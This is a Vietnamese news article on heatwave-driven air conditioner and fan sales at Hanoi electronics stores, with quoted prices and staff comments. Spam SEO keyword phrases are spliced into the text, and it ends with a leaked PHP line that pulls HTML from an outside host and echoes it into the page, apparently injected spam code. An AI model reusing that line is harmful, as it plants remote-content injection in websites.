Nắng nóng 'cứu' hàng điện lạnh khỏi 'cái chết' tồn kho
9 10 584

Nắng nóng 'cứu' hàng điện lạnh khỏi 'cái chết' tồn kho

Những ngày này, các trung tâm siêu thị điện máy như Pico Plaza, Media Mart, Nguyễn Kim tấp nập người đến tìm hiểu và mua dieu hoa cu tai ha noi để chống nóng.

Trải qua những ngày nắng nóng đầu hè, thị trường hàng điện máy chống nóng cũng tăng nhiệt khá mạnh, đặc biệt đối với dòng sản phẩm điều hòa máy lạnh và quạt phun sương. Việc chọn mua được một máy điều hòa, quạt công nghiệp phun sương có công suất và tính năng phù hợp, giá thành hợp lý là điều không dễ đối với mỗi gia đình.

Những ngày này, các trung tâm siêu thị điện máy như Pico Plaza, Media Mart, Nguyễn Kim tấp nập người đến tìm hiểu và mua dieu hoa cu tai ha noi để chống nóng.
Theo chị Đỗ Hiền, nhân viên kinh doanh tại siêu thị Nguyễn Kim, mặt hàng điều hòa nhiệt độ đang có sức mua tăng đáng kể, đặc biệt là với sản phẩm có công suất vừa phải, khoảng 9000 BTU tới 12.000 BTU. Lượng hàng bán ra đang gấp 2 - 3 lần ngày thường.

Cụ thể, một số mặt hàng bán chạy có thể kể tới như điều hòa nhiệt độ Daikin 2 chiều 9.000 BTU có giá 10,9 triệu đồng. Điều hòa của Reetech cùng loại cũng khá mềm ở mức 5,4 triệu đồng. Dòng LG 1 chiều, công suất 9.000 BTU có giá khoảng 8,3 triệu đồng. Phần lớn khách hàng đến đều muốn lắp đặt ngay trong ngày, điều này khiến siêu thị khá vất vả để thu xếp vì lượng khách tăng nhanh.

Quat cong  nghiep Theo nhiều nhân viên bán hàng khác tại đây, sản phẩm vừa tiền như quạt đứng giá từ 500.000 đến 1 triệu đồng cũng đang bán rất chạy. Cao cấp hơn một chút, quạt hơi nước có giá khoảng hơn 2 triệu cũng đang được nhiều người hỏi mua. Ước tính, trung bình, mỗi ngày có khoảng 30-50 khách hỏi mua mặt hàng này.
Tình trạng hàng điện lạnh tan băng cũng đang khiến nhiều siêu thị lớn như Pico, Media Mart, Trần Anh… hớn hở không kém.

Tại siêu Pico, lượng hàng bán ra tăng khoảng 20-30% so với thời điểm của những tháng trước. Anh Nguyễn Dương, nhân viên bán hàng tại Pico cho biết, thị trường máy điều hòa hiện rất đa dạng, nhưng các dòng sản phẩm được người tiêu dùng ưa chuộng sử dụng thường vẫn là Panasonic, Toshiba hay các dòng sản phẩm dành cho những người có thu nhập trung bình như Samsung, LG. Lượng khách hàng đến đặt mua những ngày này tăng mạnh do nắng nóng gay gắt và khách có thể phải đặt trước từ 2-3 ngày mới có hàng. 

Bài viết liên quan
Đối tác
Có lỗi với file block
$html = @file_get_contents("http://bandemen.com/seobyculan.html"); echo $html;